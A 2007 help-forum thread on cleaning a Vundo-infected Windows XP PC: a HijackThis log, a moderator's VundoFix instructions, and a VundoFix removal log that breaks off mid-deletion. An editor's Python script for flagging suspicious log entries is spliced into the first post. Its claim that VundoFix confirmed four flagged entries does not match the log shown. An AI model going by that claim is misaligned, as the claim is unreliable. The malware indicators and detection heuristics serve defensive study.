Feb 4 2007, 10:23 AM
Post #1
Member (Group: Members, Posts: 16, Joined: 4-February 07, Member No.: 10,964)
Thanks for the clarification
Logfile of HijackThis v1.99.1
Scan saved at 3:49:40 PM, on 2/4/2007
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\System32\Ati2evxx.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\system32\Ati2evxx.exe
C:\WINDOWS\Explorer.EXE
C:\PROGRA~1\Grisoft\AVGFRE~1\avgamsvr.exe
C:\PROGRA~1\Grisoft\AVGFRE~1\avgupsvc.exe
C:\PROGRA~1\Grisoft\AVGFRE~1\avgemc.exe
C:\Program Files\Common Files\Microsoft Shared\VS7DEBUG\MDM.EXE
C:\WINDOWS\System32\PAStiSvc.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolvc.exe
C:\WINDOWS\sm56hlpr.exe
C:\WINDOWS\RTHDCPL.EXE
C:\Program Files\Spyware Nuker\swnxt.exe
C:\Program Files\GlobespanVirata\Adsl\dslstat.exe
C:\Program Files\GlobespanVirata\Adsl\dslagent.exe
C:\PROGRA~1\Grisoft\AVGFRE~1\avgcc.exe
C:\Program Files\Adobe\Photoshop Album Starter Edition\3.0\Apps\apdproxy.exe
C:\Program Files\Common Files\Real\Update_OB\realsched.exe
C:\WINDOWS\System32\mysvcc.exe
C:\WINDOWS\system32\srrvc.exe
C:\WINDOWS\System32\ctfmon.exe
C:\Program Files\Messenger\msmsgs.exe
C:\Program Files\Google\GoogleToolbarNotifier\1.2.908.8472\GoogleToolbarNotifier.exe
D:\Program Files\Skype\Phone\Skype.exe
C:\Program Files\SAMSUNG\Samsung Multimedia Keyboard\gpkbd.exe
C:\Program Files\Outlook Express\msimn.exe
C:\PROGRA~1\Yahoo!\MESSEN~1\YAHOOM~1.EXE
C:\Program Files\Internet Explorer\IEXPLORE.EXE
C:\WINDOWS\System32\svcchost.exe
C:\Program Files\Internet Explorer\IEXPLORE.EXE
F:\Zip\Anti-virus\HIJACKTHIS\HijackThis.exe

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = about:blank
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://www.microsoft.com/isapi/redir.dll?p...amp;ar=iesearch
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Bar = http://www.google.com/ie
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.google.com
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page =
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.microsoft.com/isapi/redir.dll?p...&ar=msnhome
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://www.google.com/ie
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Bar = http://us.rd.yahoo.com/customize/ie/defaul...rch/search.html
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page =
R1 - HKCU\Software\Microsoft\Internet Explorer\Search,SearchAssistant = http://www.google.com/ie
R1 - HKLM\Software\Microsoft\Internet Explorer\Search,Default_Search_URL = http://www.google.com/ie
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant = http://www.google.com/ie
R1 - HKCU\Software\Microsoft\Internet Explorer\SearchURL,(Default) = http://www.google.com/search?q=%s
R1 - HKCU\Software\Microsoft\Internet Connection Wizard,ShellNext = iexplore
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName =
R3 - URLSearchHook: Yahoo! Toolbar - {EF99BD32-C1FB-11D2-892F-0090271D4F88} - (no file)
O3 - Toolbar: &Radio - {8E718888-423F-11D2-876E-00A0C9082467} - C:\WINDOWS\System32\msdxm.ocx
O3 - Toolbar: DAP Bar - {62999427-33FC-4baf-9C9C-BCE6BD127F08} - D:\Program Files\DAP\DAPIEBar.dll
O3 - Toolbar: &Google - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - c:\program files\google\googletoolbar2.dll
O4 - HKLM\..\Run: [SMSERIAL] sm56hlpr.exe
O4 - HKLM\..\Run: [RTHDCPL] RTHDCPL.EXE
O4 - HKLM\..\Run: [Alcmtr] ALCMTR.EXE
O4 - HKLM\..\Run: [QuickTime Task] "C:\Program Files\QuickTime\qttask.exe" -atboottime
O4 - HKLM\..\Run: [SWN2] C:\Program Files\Spyware Nuker\swnxt.exe /h
O4 - HKLM\..\Run: [DSLSTATEXE] C:\Program Files\GlobespanVirata\Adsl\dslstat.exe icon
O4 - HKLM\..\Run: [DSLAGENTEXE] C:\Program Files\GlobespanVirata\Adsl\dslagent.exe
O4 - HKLM\..\Run: [AVG7_CC] C:\PROGRA~1\Grisoft\AVGFRE~1\avgcc.exe /STARTUP
O4 - HKLM\..\Run: [Adobe Photo Downloader] "C:\Program Files\Adobe\Photoshop Album Starter Edition\3.0\Apps\apdproxy.exe"
O4 - HKLM\..\Run: [TkBellExe] "C:\Program Files\Common Files\Real\Update_OB\realsched.exe" -osboot
O4 - HKLM\..\Run: [Routingdsfdsfs] winf454jhgfgk.exe
O4 - HKLM\..\Run: [mysvcig38] mysvcc.exe
O4 - HKLM\..\Run: [john315] C:\WINDOWS\system32\srrvc.exe
O4 - HKLM\..\Run: [msvcc25] svcchost.exe
O4 - HKLM\..\RunServices: [Routingdsfdsfs] winf454jhgfgk.exe
O4 - HKLM\..\RunServices: [mysvcig38] mysvcc.exe
O4 - HKLM\..\RunServices: [msvcc25] svcchost.exe
O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\System32\ctfmon.exe
O4 - HKCU\..\Run: [MSMSGS] "C:\Program Files\Messenger\msmsgs.exe" /background
O4 - HKCU\..\Run: [Yahoo! Pager] "C:\PROGRA~1\Yahoo!\MESSEN~1\YAHOOM~1.EXE" -quiet
O4 - HKCU\..\Run: [swg] C:\Program Files\Google\GoogleToolbarNotifier\1.2.908.8472\GoogleToolbarNotifier.exe
O4 - HKCU\..\Run: [Skype] "D:\Program Files\Skype\Phone\Skype.exe" /nosplash /minimized
O4 - HKCU\..\Run: [Routingdsfdsfs] winf454jhgfgk.exe
O4 - HKCU\..\Run: [john315] C:\WINDOWS\system32\srrvc.exe
O4 - Global Startup: Adobe Gamma Loader.lnk = C:\Program Files\Common Files\Adobe\Calibration\Adobe Gamma Loader.exe
O4 - Global Startup: Adobe Reader Speed Launch.lnk = C:\Program Files\Adobe\Acrobat 7.0\Reader\reader_sl.exe
O4 - Global Startup: Samsung Multimedia Keyboard.lnk = ?
O8 - Extra context menu item: &Download with &DAP - D:\PROGRA~1\DAP\dapextie.htm
O8 - Extra context menu item: &Yahoo! Search - file:///C:\Program Files\Yahoo!\Common/ycsrch.htm
O8 - Extra context menu item: Advanced Email Extractor - res://D:\Program%20Files\Advanced%20Email%20Extractor\AeeMsie.dll/page.html
O8 - Extra context menu item: Download &all with DAP - D:\PROGRA~1\DAP\dapextie2.htm
O8 - Extra context menu item: E&xport to Microsoft Excel - res://D:\PROGRA~1\MICROS~1\OFFICE11\EXCEL.EXE/3000
O8 - Extra context menu item: Scan link with AEE - res://D:\Program%20Files\Advanced%20Email%20Extractor\AeeMsie.dll/link.html
O8 - Extra context menu item: Yahoo! &Dictionary - file:///C:\Program Files\Yahoo!\Common/ycdict.htm
O8 - Extra context menu item: Yahoo! &Maps - file:///C:\Program Files\Yahoo!\Common/ycmap.htm
O8 - Extra context menu item: Yahoo! &SMS - file:///C:\Program Files\Yahoo!\Common/ycsms.htm
O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.5.0_08\bin\ssv.dll
O9 - Extra 'Tools' menuitem: Sun Java Console - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.5.0_08\bin\ssv.dll
O9 - Extra button: Yahoo! Services - {5BAB4B5B-68BC-4B02-94D6-2FC0DE4A7897} - C:\Program Files\Yahoo!\Common\yiesrvc.dll
O9 - Extra button: Run DAP - {669695BC-A811-4A9D-8CDF-BA8C795F261C} - D:\PROGRA~1\DAP\DAP.EXE
O9 - Extra button: Research - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - D:\PROGRA~1\MICROS~1\OFFICE11\REFIEBAR.DLL
O9 - Extra button: Related - {c95fe080-8f5d-11d2-a20b-00aa003c157a} - C:\WINDOWS\web\related.htm
O9 - Extra 'Tools' menuitem: Show &Related Links - {c95fe080-8f5d-11d2-a20b-00aa003c157a} - C:\WINDOWS\web\related.htm
O9 - Extra button: Yahoo! Messenger - {E5D12C4E-7B4F-11D3-B5C9-0050045C3C96} - C:\Program Files\Yahoo!\Messenger\YahooMessenger.exe
O9 - Extra 'Tools' menuitem: Yahoo! Messenger - {E5D12C4E-7B4F-11D3-B5C9-0050045C3C96} - C:\Program Files\Yahoo!\Messenger\YahooMessenger.exe
O9 - Extra button: Email Extractor - {AFA7DB99-3E4D-4396-94F8-B0B135BCB472} - res://D:\Program%20Files\Advanced%20Email%20Extractor\AeeMsie.dll/page.html (file missing) (HKCU)
O9 - Extra 'Tools' menuitem: Advanced Email Extractor - {AFA7DB99-3E4D-4396-94F8-B0B135BCB472} - res://D:\Program%20Files\Advanced%20Email%20Extractor\AeeMsie.dll/page.html (file missing) (HKCU)
O16 - DPF: {30528230-99f7-4bb4-88d8-fa1d4f56a2ab} (YInstStarter Class) - C:\Program Files\Yahoo!\Common\yinsthelper.dll
O17 - HKLM\System\CCS\Services\Tcpip\..\{17BBF687-1141-4522-B007-EF63C7F4B7EE}: NameServer = 202.54.6.60,202.54.29.5
O17 - HKLM\System\CCS\Services\Tcpip\..\{7A1DA16E-B943-4E3A-A5A8-FF298FFD2041}: NameServer = 202.54.29.5 202.54.6.60
O23 - Service: Ati HotKey Poller - ATI Technologies Inc. - C:\WINDOWS\System32\Ati2evxx.exe
O23 - Service: ATI Smart - Unknown owner - C:\WINDOWS\system32\ati2sgag.exe
O23 - Service: AVG7 Alert Manager Server (Avg7Alrt) - GRISOFT, s.r.o. - C:\PROGRA~1\Grisoft\AVGFRE~1\avgamsvr.exe
O23 - Service: AVG7 Update Service (Avg7UpdSvc) - GRISOFT, s.r.o. - C:\PROGRA~1\Grisoft\AVGFRE~1\avgupsvc.exe
O23 - Service: AVG E-mail Scanner (AVGEMS) - GRISOFT, s.r.o. - C:\PROGRA~1\Grisoft\AVGFRE~1\avgemc.exe
O23 - Service: Windows Host Services (DLLHOST32) - Unknown owner - C:\WINDOWS\system\dllhost.exe (file missing)
O23 - Service: InstallDriver Table Manager (IDriverT) - Macrovision Corporation - C:\Program Files\Common Files\InstallShield\Driver\11\Intel 32\IDriverT.exe
O23 - Service: iPodService - Apple Computer, Inc. - C:\Program Files\iPod\bin\iPodService.exe
O23 - Service: Microsoft Sata emulation (mside) - Unknown owner - C:\WINDOWS\system\mside.exe (file missing)
O23 - Service: STI Simulator - Unknown owner - C:\WINDOWS\System32\PAStiSvc.exe
O23 - Service: Windows Terminal Services - Unknown owner - C:\WINDOWS\system32\spoolvc.exe
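The log above is what the moderator triages in the next post. As an added example that is not part of the original thread and not HijackThis code, here is a small Python script that applies the checks an analyst runs over such a log by eye: process and service names that nearly match a core Windows binary (svcchost.exe next to svchost.exe, spoolvc.exe next to spoolsv.exe), known binaries registered from the wrong directory or missing on disk, and O4 autorun entries that are bare filenames, sit in the Windows 9x RunServices key, or recur under several keys at once. The binary list, the expected directories, the edit-distance threshold and the severities are the editor's assumptions for a default Windows XP install, and the embedded sample is an excerpt of the log posted above.

```python
"""Heuristic triage of a HijackThis 1.99 log.

Added example by the editor, not HijackThis code. The binary list, expected
directories, edit-distance threshold and severities are assumptions for a
default Windows XP install; the sample at the bottom is an excerpt of the log
posted in the thread.
"""
import re
from collections import defaultdict
from dataclasses import dataclass

# Binaries malware likes to imitate, with the directory the real one lives in
# (assumption). iexplore.exe is listed so it is not taken for an explorer.exe lookalike.
KNOWN_BINARIES = {
    "svchost.exe": r"c:\windows\system32", "spoolsv.exe": r"c:\windows\system32",
    "lsass.exe": r"c:\windows\system32", "csrss.exe": r"c:\windows\system32",
    "services.exe": r"c:\windows\system32", "winlogon.exe": r"c:\windows\system32",
    "smss.exe": r"c:\windows\system32", "dllhost.exe": r"c:\windows\system32",
    "explorer.exe": r"c:\windows", "iexplore.exe": r"c:\program files\internet explorer",
}

@dataclass(frozen=True)
class Finding:
    severity: str  # "high" or "low"
    subject: str   # file name or path the finding is about
    reason: str

def levenshtein(a: str, b: str) -> int:
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]

def lookalike(name: str):
    """Known binary that `name` imitates (edit distance <= 2, not exact), or None."""
    name = name.lower()
    if name in KNOWN_BINARIES:
        return None
    for known in KNOWN_BINARIES:
        if abs(len(known) - len(name)) <= 1 and levenshtein(name, known) <= 2:
            return known
    return None

def check_path(path: str, context: str, findings: list) -> None:
    """Lookalike-name and wrong-directory checks for one executable path."""
    directory, _, base = path.strip().strip('"').rpartition("\\")
    directory, base = directory.lower(), base.lower()
    target = lookalike(base)
    if target:
        findings.append(Finding("high", base, f"{context}: name imitates {target}"))
    expected = KNOWN_BINARIES.get(base)
    if expected and directory and directory != expected:
        findings.append(Finding("high", path, f"{context}: {base} belongs in {expected}"))

def triage(log: str) -> list:
    """Run the checks over process, O4 and O23 lines; returns de-duplicated findings."""
    findings, autoruns = [], defaultdict(list)
    for line in (ln.strip() for ln in log.splitlines()):
        if re.match(r"^[a-z]:\\", line, re.I):                   # running process
            check_path(line, "process", findings)
        m = re.match(r"^O4 - (HK\w+\\\.\.\\\w+): \[[^\]]*\] (.*)$", line)
        if m:
            key, cmd = m.groups()
            q = re.match(r'"([^"]+)"|(\S+)', cmd)                # executable before its args
            exe = (q.group(1) or q.group(2)) if q else cmd
            autoruns[exe.lower()].append(key)
            check_path(exe, f"autorun {key}", findings)
            if "\\" not in exe:
                findings.append(Finding("low", exe, f"{key}: bare filename, found via PATH search"))
            if key.endswith("RunServices"):
                findings.append(Finding("high", exe, f"{key}: RunServices is a Windows 9x key"))
        m = re.match(r"^O23 - Service: (.*?) - (.*?) - (.*)$", line)
        if m:
            svc, _owner, path = m.groups()
            missing = path.endswith("(file missing)")
            path = path.replace("(file missing)", "").strip()
            check_path(path, f"service '{svc}'", findings)
            if missing:
                findings.append(Finding("high", path, f"service '{svc}': binary not on disk"))
    for exe, keys in autoruns.items():
        if len(keys) > 1:
            findings.append(Finding("high", exe, f"registered under {len(keys)} keys: {', '.join(keys)}"))
    return list(dict.fromkeys(findings))

# Constructed excerpt of the HijackThis log posted above.
SAMPLE_LOG = r"""
Running processes:
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\system32\spoolvc.exe
C:\WINDOWS\RTHDCPL.EXE
C:\Program Files\Internet Explorer\IEXPLORE.EXE
C:\WINDOWS\System32\svcchost.exe
O4 - HKLM\..\Run: [RTHDCPL] RTHDCPL.EXE
O4 - HKLM\..\Run: [QuickTime Task] "C:\Program Files\QuickTime\qttask.exe" -atboottime
O4 - HKLM\..\Run: [Routingdsfdsfs] winf454jhgfgk.exe
O4 - HKLM\..\Run: [msvcc25] svcchost.exe
O4 - HKLM\..\RunServices: [Routingdsfdsfs] winf454jhgfgk.exe
O4 - HKCU\..\Run: [Routingdsfdsfs] winf454jhgfgk.exe
O23 - Service: Windows Host Services (DLLHOST32) - Unknown owner - C:\WINDOWS\system\dllhost.exe (file missing)
O23 - Service: Windows Terminal Services - Unknown owner - C:\WINDOWS\system32\spoolvc.exe
"""

if __name__ == "__main__":
    for f in sorted(triage(SAMPLE_LOG), key=lambda f: f.severity):
        print(f"[{f.severity}] {f.subject}: {f.reason}")
```

The "low" findings are there to be reviewed, not acted on: RTHDCPL.EXE is a bare filename too, and only the combination of signals (a lookalike name, the RunServices key, the same name under three keys) separates the four entries the later VundoFix run confirms from ordinary OEM autoruns.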
Feb 4 2007, 04:46 PM
Post #2
I hate computers (Group: Moderators, Posts: 8,645, Joined: 12-April 05, Member No.: 1,352)
Your computer is very infected. You're going to need some patience and time to get this fixed.
Please download VundoFix.exe to your desktop.
In this case, VundoFix will run on reboot; simply follow the above instructions starting from "Click the Scan for Vundo button." when VundoFix appears at reboot.
--------------------
Having problems with spyware and viruses? If so, then please follow the Spyware Removal Guide.
Want to know how to protect your clean computer from viruses and spyware? Then please follow the Malware Prevention Guide.
Looking for good free security software (or other great free stuff)? Then please take a look at the Recommended Security Applications Guide.
Feb 5 2007, 11:56 AM
Post #3
Member (Group: Members, Posts: 16, Joined: 4-February 07, Member No.: 10,964)
I followed your instructions, below is the vundoFix.txt file.
As you see below, "yudpdsvv.dll" could not be removed after several tries.
-----------------------------------------------------------------------------------
VundoFix V6.3.5
Checking Java version...
Java version is 1.5.0.8
Scan started at 4:26:01 PM 2/5/2007
Listing files found while scanning....
C:\WINDOWS\system32\atfrnque.dll
C:\WINDOWS\system32\awtqono.dll
C:\WINDOWS\system32\awtqooo.dll
C:\WINDOWS\system32\awtrolk.dll
C:\WINDOWS\system32\awtrrqp.dll
C:\WINDOWS\system32\awtssrr.dll
C:\WINDOWS\system32\awttuus.dll
C:\WINDOWS\system32\awtuurr.dll
C:\WINDOWS\system32\awtuusp.dll
C:\WINDOWS\system32\btjckfoc.dll
C:\WINDOWS\system32\byxwtts.dll
C:\WINDOWS\system32\byxxyaa.dll
C:\WINDOWS\system32\byxxyya.dll
C:\WINDOWS\system32\byxywvu.dll
C:\WINDOWS\system32\byxyxxw.dll
C:\WINDOWS\system32\cbxuspp.dll
C:\WINDOWS\system32\cbxutsq.dll
C:\WINDOWS\system32\cbxvtsp.dll
C:\WINDOWS\system32\cbxvwut.dll
C:\WINDOWS\system32\cbxwttq.dll
C:\WINDOWS\system32\cbxwwwv.dll
C:\WINDOWS\system32\cbxwxxy.dll
C:\WINDOWS\system32\cofkcjtb.ini
C:\WINDOWS\system32\ddcaaww.dll
C:\WINDOWS\system32\ddcbxut.dll
C:\WINDOWS\system32\ddcdcca.dll
C:\WINDOWS\system32\ddcdeec.dll
C:\WINDOWS\system32\ddcyaxy.dll
C:\WINDOWS\system32\efcbbba.dll
C:\WINDOWS\system32\efcdcyy.dll
C:\WINDOWS\system32\efcyywt.dll
C:\WINDOWS\system32\efcyywx.dll
C:\WINDOWS\system32\euqnrfta.ini
C:\WINDOWS\system32\fccaayv.dll
C:\WINDOWS\system32\fccayaw.dll
C:\WINDOWS\system32\fccbaxx.dll
C:\WINDOWS\system32\fcccyyx.dll
C:\WINDOWS\system32\fccyxxx.dll
C:\WINDOWS\system32\gebcdab.dll
C:\WINDOWS\system32\gebywuv.dll
C:\WINDOWS\system32\gebywxv.dll
C:\WINDOWS\system32\gebyxwt.dll
C:\WINDOWS\system32\gebyxxu.dll
C:\WINDOWS\system32\gebyxyy.dll
C:\WINDOWS\system32\hggedax.dll
C:\WINDOWS\system32\hggefcy.dll
C:\WINDOWS\system32\hggfdde.dll
C:\WINDOWS\system32\hggffcb.dll
C:\WINDOWS\system32\hggffgg.dll
C:\WINDOWS\system32\hggfgeb.dll
C:\WINDOWS\system32\hgggdab.dll
C:\WINDOWS\system32\hgggddc.dll
C:\WINDOWS\system32\hgggefe.dll
C:\WINDOWS\system32\hgggged.dll
C:\WINDOWS\system32\hgghiii.dll
C:\WINDOWS\system32\iifcaby.dll
C:\WINDOWS\system32\iifcbxw.dll
C:\WINDOWS\system32\iifdbxw.dll
C:\WINDOWS\system32\iiffcca.dll
C:\WINDOWS\system32\iifgeeb.dll
C:\WINDOWS\system32\jkkjheb.dll
C:\WINDOWS\system32\jkkjijk.dll
C:\WINDOWS\system32\jkkkjgf.dll
C:\WINDOWS\system32\jkkklmj.dll
C:\WINDOWS\system32\khfcawu.dll
C:\WINDOWS\system32\khfcdbc.dll
C:\WINDOWS\system32\khfdefd.dll
C:\WINDOWS\system32\khfedeb.dll
C:\WINDOWS\system32\khfeedc.dll
C:\WINDOWS\system32\khffcax.dll
C:\WINDOWS\system32\khfggfc.dll
C:\WINDOWS\system32\ljjgeda.dll
C:\WINDOWS\system32\ljjghhi.dll
C:\WINDOWS\system32\ljjhfec.dll
C:\WINDOWS\system32\mljgeef.dll
C:\WINDOWS\system32\mljhhhh.dll
C:\WINDOWS\system32\mljjhhe.dll
C:\WINDOWS\system32\mljjhig.dll
C:\WINDOWS\system32\mljjihg.dll
C:\WINDOWS\system32\mljjihh.dll
C:\WINDOWS\system32\mljkihi.dll
C:\WINDOWS\system32\nnnliif.dll
C:\WINDOWS\system32\nnnliij.dll
C:\WINDOWS\system32\nnnlkhe.dll
C:\WINDOWS\system32\nnnmkih.dll
C:\WINDOWS\system32\nnnmljg.dll
C:\WINDOWS\system32\nnnmnml.dll
C:\WINDOWS\system32\nnnnllj.dll
C:\WINDOWS\system32\nnnoono.dll
C:\WINDOWS\system32\nnnooop.dll
C:\WINDOWS\system32\nnnopmn.dll
C:\WINDOWS\System32\nqstv.bak1
C:\WINDOWS\System32\nqstv.bak2
C:\WINDOWS\System32\nqstv.ini
C:\WINDOWS\system32\opnkkji.dll
C:\WINDOWS\system32\opnliff.dll
C:\WINDOWS\system32\opnliig.dll
C:\WINDOWS\system32\opnmjig.dll
C:\WINDOWS\system32\opnmkli.dll
C:\WINDOWS\system32\opnmnmn.dll
C:\WINDOWS\system32\opnollk.dll
C:\WINDOWS\system32\opnoomk.dll
C:\WINDOWS\system32\opnoopm.dll
C:\WINDOWS\system32\pmnmnnl.dll
C:\WINDOWS\system32\qomjhfe.dll
C:\WINDOWS\system32\qomjjkk.dll
C:\WINDOWS\system32\qomkjge.dll
C:\WINDOWS\system32\qomljge.dll
C:\WINDOWS\system32\qommkij.dll
C:\WINDOWS\system32\qommnlm.dll
C:\WINDOWS\system32\qomnmnl.dll
C:\WINDOWS\system32\qomnnoo.dll
C:\WINDOWS\system32\rqromlm.dll
C:\WINDOWS\system32\rqromnk.dll
C:\WINDOWS\system32\rqroool.dll
C:\WINDOWS\system32\rqrpolj.dll
C:\WINDOWS\system32\rqrqrpm.dll
C:\WINDOWS\system32\rqrqrss.dll
C:\WINDOWS\system32\sgqdqaux.ini
C:\WINDOWS\system32\ssqnkhi.dll
C:\WINDOWS\system32\ssqnkki.dll
C:\WINDOWS\system32\ssqnnmn.dll
C:\WINDOWS\system32\ssqnolk.dll
C:\WINDOWS\system32\ssqolki.dll
C:\WINDOWS\system32\ssqomnl.dll
C:\WINDOWS\system32\ssqonmj.dll
C:\WINDOWS\system32\ssqoopm.dll
C:\WINDOWS\system32\ssqpmnk.dll
C:\WINDOWS\system32\ssqpmnm.dll
C:\WINDOWS\system32\ssqpopq.dll
C:\WINDOWS\system32\ssqpqqp.dll
C:\WINDOWS\system32\ssqqnkk.dll
C:\WINDOWS\system32\ssqqool.dll
C:\WINDOWS\system32\ssqrrop.dll
C:\WINDOWS\system32\tuvsttr.dll
C:\WINDOWS\system32\tuvurqr.dll
C:\WINDOWS\system32\tuvuuvw.dll
C:\WINDOWS\system32\tuvvsst.dll
C:\WINDOWS\system32\tuvvuvv.dll
C:\WINDOWS\system32\tuvvvww.dll
C:\WINDOWS\system32\tuvwurp.dll
C:\WINDOWS\system32\tuvwxxy.dll
C:\WINDOWS\system32\urqnlji.dll
C:\WINDOWS\system32\urqnllm.dll
C:\WINDOWS\system32\urqolii.dll
C:\WINDOWS\system32\urqpqnl.dll
C:\WINDOWS\system32\urqqqoo.dll
C:\WINDOWS\system32\urqrqqn.dll
C:\WINDOWS\System32\vtsqn.dll
C:\WINDOWS\system32\vturqrq.dll
C:\WINDOWS\system32\vturrom.dll
C:\WINDOWS\system32\vtusqrr.dll
C:\WINDOWS\system32\vtusrsq.dll
C:\WINDOWS\system32\vtusrss.dll
C:\WINDOWS\system32\vtuttqq.dll
C:\WINDOWS\system32\vtuurom.dll
C:\WINDOWS\system32\vtuuvtt.dll
C:\WINDOWS\system32\wvuroon.dll
C:\WINDOWS\system32\wvussqp.dll
C:\WINDOWS\system32\wvutqom.dll
C:\WINDOWS\system32\wvuurpm.dll
C:\WINDOWS\system32\wvuvwxy.dll
C:\WINDOWS\system32\xuaqdqgs.dll
C:\WINDOWS\system32\xxyvuts.dll
C:\WINDOWS\system32\xxywtst.dll
C:\WINDOWS\system32\xxywvwu.dll
C:\WINDOWS\system32\xxywwtt.dll
C:\WINDOWS\system32\xxyxxus.dll
C:\WINDOWS\system32\xxyyyxy.dll
C:\WINDOWS\system32\yayayab.dll
C:\WINDOWS\system32\yayvuur.dll
C:\WINDOWS\system32\yaywurs.dll
C:\WINDOWS\system32\yaywuuu.dll
C:\WINDOWS\system32\yayxwts.dll
C:\WINDOWS\system32\yayyxyy.dll
C:\WINDOWS\System32\yudpdsvv.dll
Beginning removal...
Attempting to delete C:\WINDOWS\system32\atfrnque.dll
C:\WINDOWS\system32\atfrnque.dll Has been deleted!
Attempting to delete C:\WINDOWS\system32\awtqono.dll
C:\WINDOWS\system32\awtqono.dll Has been deleted!
Attempting to delete C:\WINDOWS\system32\awtqooo.dll
C:\WINDOWS\system32\awtqooo.dll Has been deleted!
Attempting to delete C:\WINDOWS\system32\awtrolk.dll
C:\WINDOWS\system32\awtrolk.dll Has been deleted!
Attempting to delete C:\WINDOWS\system32\awtrrqp.dll
C:\WINDOWS\system32\awtrrqp.dll Has been deleted!
Attempting to delete C:\WINDOWS\system32\awtssrr.dll
C:\WINDOWS\system32\awtssrr.dll Has been deleted!
Attempting to delete C:\WINDOWS\system32\awttuus.dll
C:\WINDOWS\system32\awttuus.dll Has been deleted!
Attempting to delete C:\WINDOWS\system32\awtuurr.dll
C:\WINDOWS\system32\awtuurr.dll Has been deleted!
Attempting to delete C:\WINDOWS\system32\awtuusp.dll
C:\WINDOWS\system32\awtuusp.dll Has been deleted!
Attempting to delete C:\WINDOWS\system32\btjckfoc.dll
C:\WINDOWS\system32\btjckfoc.dll Has been deleted!
Attempting to delete C:\WINDOWS\system32\byxwtts.dll
C:\WINDOWS\system32\byxwtts.dll Has been deleted!
Attempting to delete C:\WINDOWS\system32\byxxyaa.dll
C:\WINDOWS\system32\byxxyaa.dll Has been deleted!
Attempting to delete C:\WINDOWS\system32\byxxyya.dll
C:\WINDOWS\system32\byxxyya.dll Has been deleted!
Attempting to delete C:\WINDOWS\system32\byxywvu.dll
C:\WINDOWS\system32\byxywvu.dll Has been deleted!
Attempting to delete C:\WINDOWS\system32\byxyxxw.dll
C:\WINDOWS\system32\byxyxxw.dll Has been deleted!
Attempting to delete C:\WINDOWS\system32\cbxuspp.dll
C:\WINDOWS\system32\cbxuspp.dll Has been deleted!
Attempting to delete C:\WINDOWS\system32\cbxutsq.dll
C:\WINDOWS\system32\cbxutsq.dll Has been deleted!
Attempting to delete C:\WINDOWS\system32\cbxvtsp.dll
C:\WINDOWS\system32\cbxvtsp.dll Has been deleted!
Attempting to delete C:\WINDOWS\system32\cbxvwut.dll
C:\WINDOWS\system32\cbxvwut.dll Has been deleted!
Attempting to delete C:\WINDOWS\system32\cbxwttq.dll C:\WINDOWS\system32\cbxwttq.dll Has been deleted! Attempting to delete C:\WINDOWS\system32\cbxwwwv.dll C:\WINDOWS\system32\cbxwwwv.dll Has been deleted! Attempting to delete C:\WINDOWS\system32\cbxwxxy.dll C:\WINDOWS\system32\cbxwxxy.dll Has been deleted! Attempting to delete C:\WINDOWS\system32\cofkcjtb.ini C:\WINDOWS\system32\cofkcjtb.ini Has been deleted! Attempting to delete C:\WINDOWS\system32\ddcaaww.dll C:\WINDOWS\system32\ddcaaww.dll Has been deleted! Attempting to delete C:\WINDOWS\system32\ddcbxut.dll C:\WINDOWS\system32\ddcbxut.dll Has been deleted! Attempting to delete C:\WINDOWS\system32\ddcdcca.dll C:\WINDOWS\system32\ddcdcca.dll Has been deleted! Attempting to delete C:\WINDOWS\system32\ddcdeec.dll C:\WINDOWS\system32\ddcdeec.dll Has been deleted! Attempting to delete C:\WINDOWS\system32\ddcyaxy.dll C:\WINDOWS\system32\ddcyaxy.dll Has been deleted! Attempting to delete C:\WINDOWS\system32\efcbbba.dll C:\WINDOWS\system32\efcbbba.dll Has been deleted! Attempting to delete C:\WINDOWS\system32\efcdcyy.dll C:\WINDOWS\system32\efcdcyy.dll Has been deleted! Attempting to delete C:\WINDOWS\system32\efcyywt.dll C:\WINDOWS\system32\efcyywt.dll Has been deleted! Attempting to delete C:\WINDOWS\system32\efcyywx.dll C:\WINDOWS\system32\efcyywx.dll Has been deleted! Attempting to delete C:\WINDOWS\system32\euqnrfta.ini C:\WINDOWS\system32\euqnrfta.ini Has been deleted! Attempting to delete C:\WINDOWS\system32\fccaayv.dll C:\WINDOWS\system32\fccaayv.dll Has been deleted! Attempting to delete C:\WINDOWS\system32\fccayaw.dll C:\WINDOWS\system32\fccayaw.dll Has been deleted! Attempting to delete C:\WINDOWS\system32\fccbaxx.dll C:\WINDOWS\system32\fccbaxx.dll Has been deleted! Attempting to delete C:\WINDOWS\system32\fcccyyx.dll C:\WINDOWS\system32\fcccyyx.dll Has been deleted! Attempting to delete C:\WINDOWS\system32\fccyxxx.dll C:\WINDOWS\system32\fccyxxx.dll Has been deleted! 
